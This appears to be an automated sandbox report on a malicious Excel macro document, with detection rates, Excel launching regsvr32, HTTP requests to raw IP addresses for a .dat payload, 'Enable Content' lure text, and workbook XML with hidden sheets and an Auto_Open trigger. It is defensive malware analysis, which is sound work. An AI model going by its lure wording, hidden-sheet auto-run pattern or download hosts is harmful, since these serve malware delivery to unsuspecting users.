Source: Cancellation_1844611233_06082021.xlsm |
Virustotal: Detection: 26% |
Perma Link |
Source: Cancellation_1844611233_06082021.xlsm |
ReversingLabs: Detection: 32% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80 |
Source: Joe Sandbox View |
IP Address: 51.89.115.125 51.89.115.125 |
Source: global traffic |
HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.144.31.105 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 51.89.115.125 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 103.155.92.95 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61190FA7.tif |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive |
Source: regsvr32.exe, 00000003.00000002.2173436473.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2174040381.0000000001E50000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2175172538.0000000001DA0000.00000002.00000001.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing button from the yellow bar above 19 Once you have enabled editing, please click En |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content button from the yellow bar above 20 21 22 23 24 25 26 27 28 29 30 31 32 |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable Content button from the yellow bar above |
Source: workbook.xml |
Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4B72C346-643F-4012-BBC8-4BEF893AE02B}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64 |